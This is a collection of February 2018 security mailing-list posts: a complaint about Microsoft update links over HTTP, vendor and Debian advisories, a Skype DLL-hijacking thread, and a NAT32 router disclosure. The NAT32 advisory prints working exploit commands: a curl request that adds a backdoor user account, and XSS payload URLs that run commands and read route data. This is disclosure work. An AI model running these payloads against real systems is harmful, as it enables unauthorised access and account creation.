Defense in depth -- the Microsoft way (part 52): HTTP used to distribute (security) updates, not HTTPS

[Stefan Kanthak]

Hi @ll,

yesterdays "Security update deployment information: February 13, 2018"
 links the following
MSKB articles for the security updates of Microsoft's Office products:














Alternatively use yesterdays "February 2018 updates for Microsoft Office"
 and all the MSKB
articles linked there, which are a superset of those named above.

Each of these MSKB articles in turn contains one or two links to the
download pages for the updates, which except 2 (of 22) are of the form

(despite the HTTPS: used for the MSKB articles), ie. they use HTTP
instead of HTTPS, inviting to MitM attacks, ALTHOUGH the server
www.microsoft.com supports HTTPS and even redirects these requests to
!

JFTR: this bad habit is of course present in ALMOST ALL MSKB articles
  for previous security updates for Microsoft's Office products
  too ... and Microsoft does NOT CARE A B^HSHIT about it!


Microsoft also links all the MSKB articles for their Windows security
updates, for example , in
their "Security update deployment information:  , ".

Allmost all of these MSKB articles as well as those for Microsoft's Office
products (see above) in turn contain a link to Microsoft's "Update Catalog",
which ALL are of the form

(despite the HTTPS: used for the MSKB articles), ie. they use HTTP
instead of HTTPS, inviting to MitM attacks, ALTHOUGH the server
catalog.update.microsoft.com [*] supports HTTPS!

JFTR: even if you browse the "Microsoft Update Catalog" via
   [#],
  ALL download links published there use HTTP, not HTTPS!

That's trustworthy computing ... the Microsoft way!


Despite numerous mails sent to  in the last years,
and numerous replies "we'll forward this to the product groups", nothing
happens at all.


stay tuned
Stefan Kanthak


[*] catalog.update.microsoft.com is redirected to
catalog.update.microsoft.com/v7/site, which in turn is redirected to
www.catalog.update.microsoft.com/, for both HTTP and HTTPS

CONNECT https://catalog.update.microsoft.com
GET / http/1.1

| HTTP/1.1 302 Found
| Cache-Control: private
| Content-Length: 125
| Content-Type: text/html; charset=utf-8
| Location: /v7/site
| Server: Microsoft-IIS/10.0
| X-AspNet-Version: 4.0.30319
| X-Powered-By: ASP.NET
| Date: Wed, 14 Feb 2018 09:42:51 GMT

| HTTP/1.1 301 Moved Permanently
| Content-Length: 168
| Content-Type: text/html; charset=UTF-8
| Location: https://catalog.update.microsoft.com/v7/site/
| Server: Microsoft-IIS/10.0
| X-Powered-By: ASP.NET
| X-Frame-Options: DENY
| Date: Wed, 14 Feb 2018 09:42:51 GMT

| HTTP/1.1 302 Redirect
| Content-Length: 164
| Content-Type: text/html; charset=UTF-8
| Location: https://www.catalog.update.microsoft.com/
| Server: Microsoft-IIS/10.0
| X-Powered-By: ASP.NET
| X-Frame-Options: DENY
| Date: Wed, 14 Feb 2018 09:42:51 GMT

| HTTP/1.1 200 OK
| Cache-Control: private
| Content-Length: 11135
| Content-Type: text/html; charset=utf-8
| Server: Microsoft-IIS/10.0
| X-AspNet-Version: 4.0.30319
| X-Powered-By: ASP.NET
| X-Frame-Options: DENY
| Strict-Transport-Security: max-age=31536000; includeSubDomains
| Date: Wed, 14 Feb 2018 09:42:53 GMT

[#] if your browser attemps to connect to these servers with HTTP/2,
it fails: they use a blacklisted cipher suite with HTTP/2, see

[security bulletin] MFSBGN03800 rev.1 - Micro Focus Performance Center, Remote Arbitrary Code Execution or Remote Arbitrary File Modification

[cyber-psrt]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Note: the current version of the following document is available here:
https://softwaresupport.hpe.com/document/-/facetsearch/document/KM03091103

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: KM03091103
Version: 1

MFSBGN03800 rev.1 - Micro Focus Performance Center, Remote Arbitrary Code
Execution or Remote Arbitrary File Modification

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2018-02-13
Last Updated: 2018-02-13

Potential Security Impact: Remote: Arbitrary Code Execution, Arbitrary File
Modification

Source: Micro Focus, Product Security Response Team

VULNERABILITY SUMMARY
A potential vulnerability has been identified in Micro Focus Performance
Center. The vulnerability could be exploited to Remote Arbitrary File
Modification or Remote Arbitrary Code Execution.

References:

  - CVE-2017-11357

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

  - HPE Performance Center -v 12.55 and older

BACKGROUND

  CVSS Base Metrics
  =
  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector


RESOLUTION

Micro Focus has made the following mitigation information available to
resolve the vulnerability for the impacted versions of Micro Focus
Performance Center:

* The fix is applied to PC versions 12.53 and 12.55. More details can be
found here:


* If you are using older versions of the software please upgrade them to
appropriate versions before getting the fix.

HISTORY
Version:1 (rev.1) - 13 February 2018 Initial release

Third Party Security Patches: Third party security patches that are to be 
installed on 
systems running Micro Focus products should be applied in accordance with the 
customer's 
patch management policy.

Support: For issues about implementing the recommendations of this Security 
Bulletin, contact normal Micro Focus services support channel. 
For other issues about the content of this Security Bulletin, send e-mail to  
cyber-p...@microfocus.com.

Report: To report a potential security vulnerability for any supported product:
  Web form: https://www.microfocus.com/support-and-services/report-security
  Email: secur...@microfocus.com

Subscribe:
 To initiate receiving subscriptions for future Micro Focus Security Bulletin 
alerts via Email,  please subscribe here - 
https://softwaresupport.hpe.com/group/softwaresupport/email-notification/-/subscriptions/registerdocumentnotification
 Once you are logged in to the portal, please choose security bulletins under 
product and document types.
 Please note that you will need to sign in using a Passport account. If you do 
not have a Passport account yet, you can create one- its free and easy 
https://cf.passport.softwaregrp.com/hppcf/createuser.do 

Security Bulletin Archive:
 A list of recently released Security Bulletins is available here: 
https://softwaresupport.hpe.com/security-vulnerability
 
Software Product Category: The Software Product Category is represented in
the title by the two characters following Micro Focus Security Bulletin.

3P = 3rd Party Software
GN = Micro Focus General Software
MU = Multi-Platform Software

System management and security procedures must be reviewed frequently to 
maintain system integrity. 
Micro Focus is continually reviewing and enhancing the security features of 
software products to provide 
customers with current secure solutions. 

"Micro Focus is broadly distributing this Security Bulletin in order to bring 
to the attention of users of the 
affected Micro Focus products the important security information contained in 
this Bulletin. Micro Focus recommends 
that all users determine the applicability of this information to their 
individual situations and take appropriate action. 
Micro Focus does not warrant that this information is necessarily accurate or 
complete for all user situations and, consequently, 
Micro Focus will not be responsible for any damages resulting from user's use 
or disregard of the information provided in 
this Security Bulletin. To the extent permitted by law, Micro Focus  disclaims  
all warranties, either express or 
implied, including the warranties of merchantability and fitness for a 
particular purpose, title and non-infringement." 


Copyright 2017 EntIT Software LLC

Micro Focus shall not be liable for technical or editorial errors or omissions 
contained herein. 
The information provided is provided "as is" without warranty of any kind. To 
the extent permitted by law, 
neither Micro Focus nor its affiliates, subcontractors or suppliers will be 
liable for incidental, special 
or consequential damages including downtime cost; lost profits; damages 
relating to the procurement of 
substitute products or services; or damages for loss of data, or software 
restoration. 
The information in this document is 

[SECURITY] [DSA 4114-1] jackson-databind security update

[Sebastien Delafond]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-4114-1   secur...@debian.org
https://www.debian.org/security/   Sebastien Delafond
February 15, 2018 https://www.debian.org/security/faq
- -

Package: jackson-databind
CVE ID : CVE-2017-17485 CVE-2018-5968
Debian Bug : 888316 888318

It was discovered that jackson-databind, a Java library used to parse
JSON and other data formats, did not properly validate user input
before attempting deserialization. This allowed an attacker to perform
code execution by providing maliciously crafted input.

For the oldstable distribution (jessie), these problems have been fixed
in version 2.4.2-2+deb8u3.

For the stable distribution (stretch), these problems have been fixed in
version 2.8.6-1+deb9u3.

We recommend that you upgrade your jackson-databind packages.

For the detailed security status of jackson-databind please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/jackson-databind

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-

iQEzBAEBCgAdFiEEAqSkbVtrXP4xJMh3EL6Jg/PVnWQFAlqFMPsACgkQEL6Jg/PV
nWT4oAgAogKSPtNM0Jobx5rK7inaD6QjiK78neBOk+/TUXYqsMudMofrrOJoFRg/
RtasUlf+3sYflIyTaZ8jCUliBhTu9lnvzQUSoLa8PUVJ+DIwd0zOAshS78CG1/tj
pLohPrUaY5kCq/ag5ZDm1+9h26nQcvMfmEfzkQcJt/cqYZEAHyR0DoCo7mmgmH5X
swZqdFPHEv299aTLB3gEVwxb/rrGjjASTI5mlj/jS9i8ocrxt1hNk9lzPzWjOWkr
jK6XN6ekoSJxl6s0vPwFUycOGT6P+Gil7v06MSEqnwdskY4DNIme+rjeJZLWO17N
VA+9RTFTLp0QVyg2WdScVszAr/nrpA==
=jV4n
-END PGP SIGNATURE-

[SECURITY] [DSA 4113-1] libvorbis security update

[Moritz Muehlenhoff]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-4113-1   secur...@debian.org
https://www.debian.org/security/   Moritz Muehlenhoff
February 14, 2018 https://www.debian.org/security/faq
- -

Package: libvorbis
CVE ID : CVE-2017-14632 CVE-2017-14633

Two vulnerabilities were discovered in the libraries of the Vorbis audio
compression codec, which could result in denial of service or the
execution of arbitrary code if a malformed media file is processed.

For the stable distribution (stretch), these problems have been fixed in
version 1.3.5-4+deb9u1.

We recommend that you upgrade your libvorbis packages.

For the detailed security status of libvorbis please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/libvorbis

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAlqErOMACgkQEMKTtsN8
TjZNOw//YMP8ZyqSVk7xYtQikuRcz1twEgR0ar7XnJKBM1qNASj0KGPyhMfYOIJq
hifULdaLqkn9ZxNQJw8hN6jvxngdYvp+Edlg2NwCSXzVwUPLjh7WdE4yTFd+WzbN
YnMKfk0JX08KasPXOxmFUgGT2/o3VscdjnufvMzAuisJIKip8EzCEaWa/NJUfUZH
pxXPTPV5N4Z5ZKqst1RecjjSOcq1IQ0Bu/RiJoRdxntpYFGk5TuoCS6yt3HOP4xb
Sm9d6cSC9PObBgzij2LALYrfIaDctxAZ3WJ6imfuLp4vXUi0Ef7J8Rco5zCYf/Cu
RAKkk8CUI0Yl1/Ac0CGczImKzkyXo52YntFY8NExYg7HYB/RQy1KVQvFKropLhKd
uhs69QzOBCo1eOHWA2nGFbw0SiuLFoVG1ACnxuJPeWkzmgNsfs4d7XnjP/nAf7gk
yB7A7l/qOnpWmoEjdqc7h3MHIXrRFo1mOsKvLsSyRzHb59EUbRmDJGZzpIBYixen
Q9lKiNkjk3MIwkNoQ4qmhgPcisEXwgWCBcRi1lfuLuVLEYn+XnozSD47PJ2phuOa
obrAFt2TogcGsvrXAD8IwfBJxp8Fr0I8E0egtAdrhR4i7m44QmSHVUXbW/IE+au1
b/mAtE4zejmkfUQnt+N6OJhePQE+Bf3HmTnFAl2qtjeMPPo02P0=
=61Eu
-END PGP SIGNATURE-

NAT32 Build (22284) Remote Code Execution CVE-2018-6940 (hyp3rlinx / apparition security)

[apparitionsec]

[+] Credits: hyp3rlinx  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/NAT32-REMOTE-COMMAND-EXECUTION-CVE-2018-6940.txt
[+] ISR: Apparition Security

[-_-] D1rty0tis
 

Vendor:
=
www.nat32.com


Product:
=
NAT32 Build (22284)


NAT32 is a versatile IP Router implemented as a WIN32 application.


Vulnerability Type:
===
Remote Command Execution 


CVE Reference:
==
CVE-2018-6940


Security Issue:

NAT32 listens on Port 8080 for its Web interface.

C:\>netstat -ano | findstr 8080
  TCP0.0.0.0:8080   0.0.0.0:0  LISTENING   3720


If the 'Password Checking' (BASIC authentication) feature is NOT enabled (user 
must select it under config tab) then remote attackers who can reach
NAT32 can potentially execute arbitrary commands, if authentication is enabled 
they will get 'Unauthorized' server reply, however, read on ...

e.g.

Add user account.

C:\>curl "http://x.x.x.x:8080/shell?cmd=run+net+user+D1rty0Tis+abc123+/add;


run start net user D1rty0Tis abc123 /add Done



If NAT32 'Password Checking' feature IS enabled, remote attackers can STILL 
potentially issue arbitrary commands exploiting a
Cross Site Scripting vulnerability in the HTTPD code of NAT32, if authenticated 
NAT32 users click a malicious link
or visit an attacker controlled webpage. 

Also worth mentioning, NAT32 implements BASIC authentication which pass BASE64 
Encoded credentials which can be easily
revealed if sniffed on network.

When 'Password Checking' is enabled attackers using Ajax calls via XSS would 
need to use a combination of '%0D%0A' and double encoding
to deal with 'white-space' in order for the payload to stay intact.

%25 for '%' sign then 20 (%2520) = %20, using %20 or %2B will not cut it, 
however '%0D%0A' (CRLF) and '%2520' encoding serves us well.

NAT32 has an interesting Command 'EXECR' that can allow attackers to capture 
Command output response from the server to see right away if an
attack was success or not.

e.g.

Add account and get response (EXECR)

HTTP Response:


The command completed successfully.

execr net user D1rty0Tis abc123 /add Done



The NAT32 'winroute' Command will return host route information.

XSS response

e.g.



DestinationMask  Nexthop  Metric IfIndex Type 
Proto Age
0.0.0.0 0.0.0.0 192.168.1.210   b4 3 21:41 
[min:sec]
127.0.0.0   255.0.0.0   127.0.0.1  306  13 3 22:04 
[min:sec]
127.0.0.1   255.255.255.255 127.0.0.1  306  13 3 22:04 
[min:sec]
127.255.255.255 255.255.255.255 127.0.0.1  306  13 3 22:04 
[min:sec]



Exploit/POC:
=
NET32 Password Checking not enabled...

C:\>curl "http://x.x.x.x:8080/shell?cmd=run+net+user+D1rty0Tis+abc123+/add;


NAT32 BASIC authentication enabled use XSS...

Add backdoor account and capture CMD output using NAT32 'execr' shell command.
http://x.x.x.x:8080/shell?cmd=var%0D%0Axhr=new%0D%0AXMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open('GET','http://x.x.x.x:8080/shell?cmd=execr%2520net%2520user%2520D1rty0Tis%2520abc123%2520/add',true);xhr.send(null);

Get Windows Routes (info disclosure):
http://x.x.x.x:8080/shell?cmd=%3Cscript%3Evar%0D%0Axhr=new%0D%0AXMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open(%27GET%27,%27http://x.x.x.x:8080/shell?cmd=winroute%27,true);xhr.send(null);%3C/script%3E



Network Access:
===
Remote


Severity:
=
High


Disclosure Timeline:
=
Vendor Notification: February 9, 2018
Vendor acknowledgement: February 9, 2018
Vendor "I've decided to remove the HTTPD code from Build 22284 of NAT32" : 
February 12, 2018
www.nat32.com website reads "NAT32 Version 2.2 Build 22284 is temporarily 
unavailable." : February 13, 2018
February 14, 2018 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

[SECURITY] [DSA 4112-1] xen security update

[Moritz Muehlenhoff]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-4112-1   secur...@debian.org
https://www.debian.org/security/   Moritz Muehlenhoff
February 14, 2018 https://www.debian.org/security/faq
- -

Package: xen
CVE ID : CVE-2017-17563 CVE-2017-17564 CVE-2017-17565
 CVE-2017-17566

Multiple vulnerabilities have been discovered in the Xen hypervisor:

CVE-2017-17563

Jan Beulich discovered that an incorrect reference count overflow
check in x86 shadow mode may result in denial of service or
privilege escalation.

CVE-2017-17564

Jan Beulich discovered that improper x86 shadow mode reference count
error handling may result in denial of service or privilege
escalation.

CVE-2017-17565

Jan Beulich discovered that an incomplete bug check in x86 log-dirty
handling may result in denial of service.

CVE-2017-17566

Jan Beulich discovered that x86 PV guests may gain access to
internally used pages which could result in denial of service or
potential privilege escalation.

In addition this update ships the "Comet" shim to address the Meltdown
class of vulnerabilities for guests with legacy PV kernels. In addition,
the package provides the "Xen PTI stage 1" mitigation which is built-in
and enabled by default on Intel systems, but can be disabled with
`xpti=false' on the hypervisor command line (It does not make sense to
use both xpti and the Comet shim.)

Please refer to the following URL for more details on how to configure
individual mitigation strategies:
https://xenbits.xen.org/xsa/advisory-254.html

Additional information can also be found in README.pti and README.comet.

For the stable distribution (stretch), these problems have been fixed in
version 4.8.3+comet2+shim4.10.0+comet3-1+deb9u4.1.

We recommend that you upgrade your xen packages.

For the detailed security status of xen please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/xen

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAlqErBcACgkQEMKTtsN8
TjaR6BAAlxX93JKrd2klt5IlZ7+0FGw7Ml5lg81+ZDsMqAkOox9ynRzzN87nzmRX
HhSQWU5fU8RQUSvMKOgTGLE6tZ3aOX/5vTsCFrxqr6M01X4yYONXe6n2+M/Cnm00
IwVxeVudZVv7ue1bxbBa6YBXxa0Z5+5m19qtU33EHUwIh6W/pHMTKcU9cw57mhiI
Qxojsi3/9M4rdwh2BGLVpHQ8qW4wyMvf8HOXn4SVqWGBK3LZCmyGuOKgj4gYuk13
3qg+i8WOCZsubvximYb41eu8XfW0oihajgmB/SkWBtScs/q09wn1gRh/kwEBmPzs
3s5d/Z47VAEP5O8lJHJmHX1+ULKczgsFHWb6vDeUgrrvWqGZ2hdZUkeo5mVLF2iB
h2NlSSm734Lxb0jGLcpDWiYitpzv3vGvm8tf14r8Vt4mfEb+6+pD8T7tD5pK4Gb0
weFE+PoakMbzmTKjkyets6kKOLh9rwoO5pk+Epg8ancVYG7wkCenpb/GIID94yly
nitfKQMr9uuFP1tp04aCVcXfsDVnCKkTwfRx6Ie4LS9m38MiNosxJogWS6ywOFj2
os/DcYMtn/J5w+9YPOHqLod7yJVXBBA0rb1etN8r/I76RjX/d085rjN4UQ17wdrU
kRFdAPmsyZ6XEgmACfppczEXS+3adLp6GGfMiunzR0Ruxvq2AHA=
=o99Q
-END PGP SIGNATURE-

Re: [FD] Defense in depth -- the Microsoft way (part 51): Skype's home-grown updater allows escalation of privilege to SYSTEM

[Jeffrey Walton]

On Fri, Feb 9, 2018 at 1:01 PM, Stefan Kanthak  wrote:
> Hi @ll,
>
> since about two or three years now, Microsoft offers Skype as
> optional update on Windows/Microsoft Update.
>
> JFTR: for Microsoft's euphemistic use of "update" see
>   
>
> Once installed, Skype uses its own proprietary update mechanism
> instead of Windows/Microsoft Update: Skype periodically runs
> "%ProgramFiles%\Skype\Updater\Updater.exe"
> under the SYSTEM account.
> When an update is available, Updater.exe copies/extracts another
> executable as "%SystemRoot%\Temp\SKY.tmp" and executes it
> using the command line
> "%SystemRoot%\Temp\SKY.tmp" /QUIET
>
> This executable is vulnerable to DLL hijacking: it loads at least
> UXTheme.dll from its application directory %SystemRoot%\Temp\
> instead from Windows' system directory.
>
> An unprivileged (local) user who is able to place UXTheme.dll or
> any of the other DLLs loaded by the vulnerable executable in
> %SystemRoot%\Temp\ gains escalation of privilege to the SYSTEM
> account.
>
>
> The attack vector is well-known and well-documented as CAPEC-471:
> 
>
> Microsoft published plenty advice/guidance to avoid this beginner's
> error: ,
> ,
> 
> and
> 
> ... which their own developers and their QA but seem to ignore!
>
> See 
> for the same vulnerability in another Microsoft product!

Not sure if this is related, but:
https://winbuzzer.com/2018/02/14/microsoft-just-killed-skype-classic-response-unfixable-security-bug-xcxwbn/

Microsoft today squashed a bug that was found in Skype’s updater
process earlier this week. However, it seems the company’s method for
stopping the flaw is to kill off the Skype classic experience. If that
is the case, users of Skype on Windows 7 and Windows 8.1 could lose
access to the service.

As reported on Monday, a security vulnerability could give hackers
access to system-level privileges. If properly exploited, attackers
could use Skype as a backdoor to get full system rights and enter all
areas of an operating system.

In response, Microsoft said it was unable to fix the bug immediately
because it would require a lot of work. Indeed, the company said patch
the flaw would take a massive code rewrite. In other words, Microsoft
would need to overhaul the whole underpinning of the classic Skype
program.

It seems Microsoft found an alternative to rewriting code and fixing
Skype… the company has decided to effectively kill off the classic
app. The older version of Skype is no longer available anywhere as a
download.
...